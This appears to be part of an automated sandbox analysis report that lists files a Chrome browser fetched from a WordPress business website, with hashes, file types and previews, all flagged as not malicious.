                                                                                                                      SHA-512:3E8A5ABBA588899A990106D6DA1BD926CC3064EF2C94A084188B22483C3299479C1A7A10D49CD1F719134DA90A0960685FF3155848E210F99068DD5A9239B648
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/lewis.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................+..........,.............................................................................................................................................J.J.........................................................................................@.!".. 0P.2.1$#4A3%........................!1..AQq"2.@.a.B.......R#3C..br40P...S$. .T.....................! @P1.0.Qa.....................!1A.Qaq.@.... P..0.........................................................................................................................................................................................................................J.l.1Li................>.l*^.Sz.....\..z............'..........$!..U....W.1rik.z.9.H.......&,.i...<=..U`...a.uE.......<H...]e....1z........g.....7<....I.o...>l~..{=5.Z...._........1.kb...............)zz+\*I.{......|........nZ=3r..w.my........'b.o.G.;.w<..n...c...@.......6.jn....'..h.H.e......f....5w.....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (8999), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):8999
                                                                                                                      Entropy (8bit):5.0596643810577016
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:NKasXzHD9D5/6J8bvctcfqqTapzikrCeexsvfip9Y8pY7pZpz9n+HyQ8m8Fwmtre:wjzHD9Dpm8L2cfqqTapOeexsvfip9Yne
                                                                                                                      MD5:900BAD1DBD9B131A99F31703A66340F3
                                                                                                                      SHA1:CA580144BE55DABAE951A984529A5250D279B129
                                                                                                                      SHA-256:3C9EB9BB1076BBB11745885964334DF870BF7EB621DAA5E7475A9A5CF4B2E424
                                                                                                                      SHA-512:D0CF2C673096B76E4018A4A7F2B900570BA0094116E69BA4528B96E27F5339CD20A1CCD68ADBBA0F1E1D854CFF08A7EA10605D75D04AC5BE3E2F8CD1DA04A552
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/waypoints.js?ver=4.0.2
                                                                                                                      Preview:!function(){"use strict";var t=0,e={};function i(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+t,this.options=i.Adapter.extend({},i.defaults,o),this.element=this.options.element,this.adapter=new i.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=i.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=i.Context.findOrCreateByElement(this.options.context),i.offsetAliases[this.options.offset]&&(this.options.offset=i.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),e[this.key]=this,t+=1}i.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},i.prototype.trigger=function(t){this.enabled&&this.callback
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3832)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):242811
                                                                                                                      Entropy (8bit):5.6918902441176185
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:wenUzsh9sLdY6tpIOgi1MqkdHRsEpmYVLXmMWQs:weUndFRl1MqkHsEpmYVLX/WB
                                                                                                                      MD5:A7E80AD3BC939E9917EBEDF38C360D92
                                                                                                                      SHA1:CD613F984B03361E4DA257CA6E29418C74CF0049
                                                                                                                      SHA-256:9148119420E8443966EE1E6DF8ABC4EC0C302C5E06A4517C2FDCD2F51743003A
                                                                                                                      SHA-512:2B450474D938446084B45E6D95A72545A39E384D6B20C16203331291D55CAE1DF248BBC707A646008D146AFB188E94B988617D6311E90EE869C89ACB0A8EC091
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.gstatic.com/maps-api-v3/embed/js/59/1/init_embed.js
                                                                                                                      Preview:(function() {'use strict';function aa(){return function(a){return a}}function da(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2620)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2711
                                                                                                                      Entropy (8bit):5.221876664182422
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:NbBSHLadoNsotDykhwy5irSUdhw7SUKYE4R1ZOlxOcHyOqCpi4tGErM7eeqxPNke:VBdGDh2uYxOcHyOqCg4z4E3
                                                                                                                      MD5:2A651F118ED794F9BDC86EF7EB86859A
                                                                                                                      SHA1:044DAF3A8F2789D7B80948DCF640BB72775F9DF0
                                                                                                                      SHA-256:C962E74A0CD768609B29C247028BD61C3229A50BB3ABE908FEEAA98962EB0971
                                                                                                                      SHA-512:29A20F42BA55BCDE7849AA21B8A26BE89D0911CF480197557FD53C12566AB076BA56C34B789ADA36B41B679B0E5017EA2F845F767DCD0041C0F5AB1C9BB616D1
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * jQuery Mousewheel 3.1.13. * Copyright OpenJS Foundation and other contributors. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(u){var f,d,e=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],t="onwheel"in window.document||9<=window.document.documentMode?["wheel"]:["mousewheel","DomMouseScroll","MozMousePixelScroll"],w=Array.prototype.slice;if(u.event.fixHooks)for(var i=e.length;i;)u.event.fixHooks[e[--i]]=u.event.mouseHooks;var c=u.event.special.mousewheel={version:"3.1.12",setup:function(){if(this.addEventListener)for(var e=t.length;e;)this.addEventListener(t[--e],n,{passive:false});else this.onmousewheel=n;u.data(this,"mousewheel-line-height",c.getLineHeight(this)),u.data(this,"mousewheel-page-height",c.getPageHeight(this))},teardown:function(){if(this.removeEventListener)for(var e=t.length;e;)this.removeEventListener(t[--e],n,!1);else this.onmousewheel=null;u.removeData(this,"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):304
                                                                                                                      Entropy (8bit):4.684025727109969
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:UInX9ufPWQwWrAAujZXI9UXB07RQrAAdy6FJO:UInNiPjwWejSeNysg
                                                                                                                      MD5:740B238EB30B761D0D3B8541932862CA
                                                                                                                      SHA1:6EBB71D4875D2F8B42BB011C26E2D0325CE328DD
                                                                                                                      SHA-256:DC71F382E4E485C110A5BDC7763A35849BA5ECFD597A003E8E6D99E587FDB880
                                                                                                                      SHA-512:99A63254843DC93820F28204EFE6C4F082B76E867CE17B3A74D515153DC4A22901646416E4E105B43B1420A849ED581EAF5B171798F133FF5656C8141B355CCA
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient-child/style.css?ver=15.0.6
                                                                                                                      Preview:/*..Theme Name: Salient Child Theme..Description: This is a custom child theme for Salient..Theme URI: https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266..Author: ThemeNectar..Author URI: https://themeforest.net/user/themenectar..Template: salient..Version: 1.0..*/............
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (353)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):39738
                                                                                                                      Entropy (8bit):4.972024528639363
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:K1B1FFNOiRE82RhSTCLlz6lM/9caVZ2YTTAqoCU/Gke:K1/hTExRhSTCLlzoM/9caVZ2YTTAqoCx
                                                                                                                      MD5:051A48CF0660A088E37487842A8896F9
                                                                                                                      SHA1:849DB5EBCA8E63D8883377FF07C91FC6F21B601D
                                                                                                                      SHA-256:A2B4C3AD220C8D28533887965FBB1E6C1382588D200EB9D95250F929A567BA1A
                                                                                                                      SHA-512:41D81A48D117CC79EC5DCA1793DBE56FF32024C04992E1BE3F3E0B99C772FE5BAAF629699E7CAD6B7501118B964EE24DCC5FD17E146B21C2AA58D6BB1F356FFA
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=6.9.1
                                                                                                                      Preview:...vc_parallax-inner iframe,..vc_video-bg iframe {. max-width: 1000%.}...vc_clearfix:after,..vc_column-inner::after,..vc_el-clearfix,..vc_row:after {. clear: both.}...container:before,..container:after,..container-fluid:before,..container-fluid:after,..row:before,..row:after,..modal-footer:before,..modal-footer:after,..vc_row:before,..vc_row:after {. content: " ";. display: table;.}..container:after,..container-fluid:after,..row:after,..vc_row:after {. clear: both;.}...vc-composer-icon,.[class*=" vc_arrow-icon-"],.[class^=vc_arrow-icon-] {. speak: none;. font-variant: normal;. text-transform: none;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale.}...vc_row:after,..vc_row:before {. content: " ";. display: table.}../*nectar addition*/.@media (max-width: 690px) {. .vc_hidden-xs {. display: none!important. }. .vc_el-clearfix-xs {. clear: both. }.}..@media (min-width: 691px) and (max-width: 999px) {. .vc_hi
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (15660)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):18617
                                                                                                                      Entropy (8bit):4.746740754378132
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:Unb0kcuPTb9Uh31//bEP+XgA1N9CleffJmp3:Ub0/U9Uh31//YWXgAJffC3
                                                                                                                      MD5:32BEB68A374E3AEAC00ABDF9E12B84EA
                                                                                                                      SHA1:B5D18AA625E8696DD9D07CD0869337717B211AE0
                                                                                                                      SHA-256:5AAD5FBD4238981A9FF5E2772FF1353DFE1A801FB49542FE157418C1438F7782
                                                                                                                      SHA-512:8FC41038B4DC2FC2465422FB3144B71C2ACD2F4552607369314FEC9B7F561B7A3919CDC4219DF2089395241168FFBFE29E67DDDA834E66C27E4C88066C8F4496
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-includes/js/wp-emoji-release.min.js?ver=6.1.7
                                                                                                                      Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/14.0.2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return b(d);return b(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,a){return o(d,function(d){var u,f,c=d,e=x(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,n),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,n,r,o,i,s,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a]
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7053
                                                                                                                      Entropy (8bit):7.431758888454918
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:SROmSV84twEdCfWY9cNYjbdLE1nuQ+fB04i+6sB:Wfa84yEUOujb5E53+feO6sB
                                                                                                                      MD5:ACF13A47BC5977E9E6825A57400EAC65
                                                                                                                      SHA1:347F4A10BA167DB8EF214DB6D0E3CEAECBE557AB
                                                                                                                      SHA-256:16E62D1C1B9790D640F8B8ED021865B9D38437FAB0A0E94FFEAE00DDC159F557
                                                                                                                      SHA-512:4A1EB5F29E51B7BE246C2885778D727E73E9F07B02510B97A03760212DD6C4A9AFF08BC092111D2323EAB5DAE5EA3CAAA508B20FD5F2660AB5C8A1F2146F9FB7
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d........................2................................................................................................................................................J.J......................................................................................... ..0@1..4..2!5".%......................1..3.. !.."r.AQaq....BR...#40@.2..s..CbS................... P..@.!0.a..................... !1Aa.Qq.0@..............................................................................................................................................................................................................................................................................S.H...x...s.....<....IW.."...1....<.Nm...P.E......kK..5...R).x..2.<.....P...6.F..'..W._..5...M.....=}& Y|.$.Y...Nvj/.2.m.c..|.%>9...x....y..0..:.c.K.V....cZ<....<..9....b...._......J......Y.........~...:...i....>...LkG....'.y.>.z.L@.y....-.../g8o..............m..'.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12018
                                                                                                                      Entropy (8bit):7.7700105163252
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Ky+ByAnyhf8C23QizR+Z79ZBv1wVjZKLVA8v7tWiWpzlYn3sJ58ZtlWY8kqGeF7y:jAnGwNzRqrwVjZK57v55WpzlSGt7y
                                                                                                                      MD5:A28974449C7C78C4950C0956528974F6
                                                                                                                      SHA1:E606949AAA154DCC5A0EEE3E9E31F10A87A2DDDD
                                                                                                                      SHA-256:1B20431761B8E5B517DB1F7DC0A8F6E5316F7E2A82E39ACA1B13141323E15C6A
                                                                                                                      SHA-512:04A3F18A8832A921DC106E224996BDB7D8787D90354DAF68E937336C24D82714D0E97AD329825006B63591DF93DEA96833DD894A3F51056662B1D3DAC502AEB9
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................".................................................................................................................................................J.J..........................................................................................@.1 .2..4.P!5."3.0`.......................!1.. AQq.."r.@a....2BR.#s..b..3S4P...C0`.$c.................... P...!1a@`..pQ.....................1!. AQaq.@...P...0...`....................................................................................................................................D<..s/.<.x6.... ..U............zUF......tZ.?v:.O.g..%.............%(A........t.w...{]F..r.,.$.vDY.............`....f.l..-.9....m......%..E..B............N..u.yM........[..].H;,Zm.KjoF..5....d..............a...7^.>.mU.....xz-.}.....o}.....{...[.[7.........+.....u.....ZP..g......m..W3]....5d...Ie.............~..n.h.....{<=..>.......4...`]..Q".>...........&..~..n.h.....{<=..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):7696
                                                                                                                      Entropy (8bit):7.452172173700001
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:DfHGVZtEA3+KWacSDNtooki+uGjpOziGURGzzl9lYuaQxbt:DfHiHEAOKdcSxtoo1mVgl0Et
                                                                                                                      MD5:88C032B2978EA1B18578B247AB404497
                                                                                                                      SHA1:35EEA9259F0932C9D1943846FF850770797F91D4
                                                                                                                      SHA-256:59FE6D0854BA4DE50FE17F8CAC3BBF65DC3CB82B064DA09A82DE164CF4DCF283
                                                                                                                      SHA-512:21B6067ACB5921E9E933B8CC76BDBE92B0BFE10CC835959422DCB8C932D70EA0477DE5FDF584C031711C8CA51DD5BBCABF218701547C73556EE74A710B560A8C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/superior.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d........................*................................................................................................................................................J.J.......................................................................................P.... 0@!1"#.4.563.2$%......................!1A...Qa.".q....2BR.#. .b.0@r.3$.....Cs...........................................!1AQa.q... P.0...@...............................................................................................................................................................................................................................................................................(..D..{....l.0.A..A..:pHr.s.}..H...p...L.qI...X.!X..H.,.:F..-.BI..g.r.`n.D\..A.'....".,....I...T.....0...dp..l..n.5...o+X..L.M..>....B>h..L.. ...Z`......W.@.Qi."a.c{....K..V.KH....i..T.B.8....- .......<.p.L......d........p.D....W..%$...0uI.V..^..dI...>.R.+..9...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):14955
                                                                                                                      Entropy (8bit):7.840925989375588
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:dm4i63pEPxy3orLv9eBxs64hXMlS9hkTNKqt+ElNf5:ni5pyYrLv9e4cleGpthDf5
                                                                                                                      MD5:C186016FE37DBF7FDB68AA437FDD0579
                                                                                                                      SHA1:F8ADD00440D1FF9A6DA6CF51FB5BEE56FC9CA6C1
                                                                                                                      SHA-256:0DDF54ED1152FB28DC5F9D69D53883E748A869B2152EBCC8E4AE1927AEAC3B54
                                                                                                                      SHA-512:5F01AF77812B3BA3229D63A15C5E6F5AB4DF2350248D9A3BB2333AFDE6964ADD03E6492FFF6DAF6717049B9F8DB657BC547DD0611D0BE78012766FB701A735CD
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................T...V..*...:i............................................................................................................................................J.J.............................................................................................0!1"2 @.A34.P.#5%.&......................!1..AQq"2.a...0....BRbr#3.@..C.P.S .s$ct......................! qA0..@.a......................!1AQaq...0...... @P...........................................................................................................................................................7..................K..3.................[}4..2......#...CW....s..=...*..*..6.RD......Wd..g..F.......S...".:...9.......E-.!K|....f...E8.bR+r&....B>J.........J.l....d.............x.".<.@...|#%$.rBV.H.>#...p.I.4..Q..R.h#...b H.)[,.9......S..o..+!..`q.Sd.......t..3.J..m$...H..%.....h....I....&...:r....[.)...[%:...JHJ.@.......[.9.D..C`..j.J...d0.%.L.....@.y.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (724)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3487
                                                                                                                      Entropy (8bit):5.374202215346524
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:rlxH0aKpBnexBie6sMoz1hABpFUvz6w2t2+lWURBzAevqBZZon:hxUaKGCaTlL6fcsdAevqBZZo
                                                                                                                      MD5:73D5EE12B407CF2AC6E81A7E63892875
                                                                                                                      SHA1:49E96EE72C74B226C79CB59A445FB6D273910845
                                                                                                                      SHA-256:8A38DCA1E6BEE52C4EBD3F101762FFE653C5E2DD934710CC01F4E8D2414EC416
                                                                                                                      SHA-512:DC87DEB927505D652E1A24F80FEA3BBBC03567932B5D53A13FA4EBF801664D0CE18352F911CF116D73B8061621572A81AC37ECFA59437C281928B059DAEBB104
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('overlay', function(_){var Zwa=function(){},AB=function(a){a.HA=a.HA||new Zwa;return a.HA},$wa=function(a){this.Eg=new _.Nm(()=>{const b=a.HA;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},bxa=function(a,b){const c=AB(a);let d=c.Fg;d||(d=c.Fg=new $wa(a));_.Kb(c.Eg||[],_.uk);var e=c.Ig=c.Ig||new _.Xpa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new axa(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.Om(d.Eg);c.Eg=[_.sk(a,"panes_changed",e),_.sk(f,"zoom_changed",e),_.sk(f,"offset_changed",e),_.sk(b,"projection_changed",e),_.sk(f,"projectioncenterq_changed",e)];_.Om(d.Eg);b instanceof _.Wk?(_.pl(b,"Ox"),_.M(b,148440)):b
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (9969), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9969
                                                                                                                      Entropy (8bit):4.871506588265729
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:oqzuXurcebuaucab166+AYSKY+KAgSxw8HtNIu8uAuG5fu2VtU6FQJXKLJh2Ri2:VzuXurcebuauci166+AYSKY+KAgSxDHL
                                                                                                                      MD5:8404BDC053F99CB0843E419CCA5CEECB
                                                                                                                      SHA1:CC41E58BFDF77152ABC2EC9729DD0D334D073F8B
                                                                                                                      SHA-256:2EC3E2B136916FF74716798A3DB342AE5C04E77F497DD8A6B13333E1CBB0E34A
                                                                                                                      SHA-512:E9ECBB308913E934EA803BC90039F061B8031007AA119131DC07B5971CCEB3536E849C79D00CFD26C824626E63EA71A743CFCA6303827E6CACF333E877841EFC
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=15.0.6
                                                                                                                      Preview:#header-secondary-outer .sf-menu li li ul{margin-left:-20px;margin-top:-20px}#header-outer #header-secondary-outer .nectar-menu-icon-img{margin-bottom:0;width:16px;height:auto;vertical-align:middle}#header-secondary-outer .nectar-menu-icon,#header-secondary-outer .nectar-menu-icon-img{margin-right:7px;top:0;line-height:inherit;display:inline-block}body[data-hhun="1"] #header-secondary-outer[data-remove-fixed="0"]{transition:transform .3s ease}#header-secondary-outer #social li a{display:block;line-height:22px;height:24px;position:relative;transition:all .2s linear;-webkit-transition:all .2s linear;background-position:center top}#header-secondary-outer #social li a i{color:#777;transition:all .2s linear;-webkit-transition:all .2s linear}#header-secondary-outer #social li .behance,#header-secondary-outer #social li .vimeo{background-color:#666}#header-secondary-outer #social li .behance:hover,#header-secondary-outer #social li .vimeo:hover{background-color:#000}body #header-secondary-out
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):111
                                                                                                                      Entropy (8bit):4.570468097677505
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YWR4buWsyLMfQxaNmX/QIisuXU7+rdXUpfTgXMlY:YWybucxaNmX4IIk7+BkiX6Y
                                                                                                                      MD5:BE96523D59C777FD1E766DD72959C061
                                                                                                                      SHA1:CAE261867A3EEB5819337170719F3947DCA4DBE7
                                                                                                                      SHA-256:B8D22578EC27DC3FAC63EBF4546847B8553D5CF3E3077F72BB8EA9F70530D2E5
                                                                                                                      SHA-512:B696B7CE70E935D8A8FAB333593E88AD4F0958F07A7FCF86E4EE4282C39009225FEEB3C0A170EE8EAD92D1B087766DF9BAA04CA479B0B24D1B4BE0CBB6D87E32
                                                                                                                      Malicious:false
                                                                                                                      URL:"http://ip-api.com/json/?fields=status,country,regionName,city,query"
                                                                                                                      Preview:{"status":"success","country":"United States","regionName":"New York","city":"New York","query":"8.46.123.228"}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):18596
                                                                                                                      Entropy (8bit):7.988788312296589
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:h5D5WUhNanar/Z19V6iGCYIqoPfHwfr13GPgqbrxremyFKKWB:h/NaOrBGCYIBPfQD1xqPhl
                                                                                                                      MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                                                                      SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                                                                      SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                                                                      SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                      Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10978
                                                                                                                      Entropy (8bit):7.699980119335929
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZTyByzpTOLHJ2AybaoiCUWWtQo27jQNckworeHzDm2YRgC82jMEPUjK:B3p3aopUWeNYjEXCPYeC82BPUjK
                                                                                                                      MD5:01234D3DE0C36DCA6BC3A6D9F10744A2
                                                                                                                      SHA1:D38D39F138D0BC3F0572BDE12B7C109EA149818D
                                                                                                                      SHA-256:DA2FA8AC2A9CF0E1A90515707C9E02D4FBA5D36ADF33F1680E7CDBAA7D278CD6
                                                                                                                      SHA-512:A34DBBE6004023697BD01FC34EB2EEEE5B952F31400462FF9D7DB1496B72E3958199F95F025DF82E169EF475BF39BBF01A026762EDE56CAE0A5907682E6FBAE3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/ibm.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................*.............................................................................................................................................J.J........................................................................................... 0!@...2....................3.....!1...AQa2 0@q."...B#......................................a!1..Q. Aq..0@....................@.................................................................................................................................................................................................................................M .3..[#.d....z-..i...^-.|..(..P...s........@i..&s..8.[...'s[!U..i...&K..!.d+..IS9...............4...=4.......-4.&s..>^..>.....X._w....0.}...m.d..].r"..d%.\.E...K......JSf...K.f].....P.*........{...L.X2.......[l.4a.<.q.-.4.j.h.<z.........n..}}.J......=.q...o>n.s.=\clZ..Z..y.lZ...........#...\....`.....v.]...k....=.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):111
                                                                                                                      Entropy (8bit):4.570468097677505
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YWR4buWsyLMfQxaNmX/QIisuXU7+rdXUpfTgXMlY:YWybucxaNmX4IIk7+BkiX6Y
                                                                                                                      MD5:BE96523D59C777FD1E766DD72959C061
                                                                                                                      SHA1:CAE261867A3EEB5819337170719F3947DCA4DBE7
                                                                                                                      SHA-256:B8D22578EC27DC3FAC63EBF4546847B8553D5CF3E3077F72BB8EA9F70530D2E5
                                                                                                                      SHA-512:B696B7CE70E935D8A8FAB333593E88AD4F0958F07A7FCF86E4EE4282C39009225FEEB3C0A170EE8EAD92D1B087766DF9BAA04CA479B0B24D1B4BE0CBB6D87E32
                                                                                                                      Malicious:false
                                                                                                                      Preview:{"status":"success","country":"United States","regionName":"New York","city":"New York","query":"8.46.123.228"}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 322 x 227, 8-bit/color RGB, non-interlaced
                                                                                                                      Category:downloaded
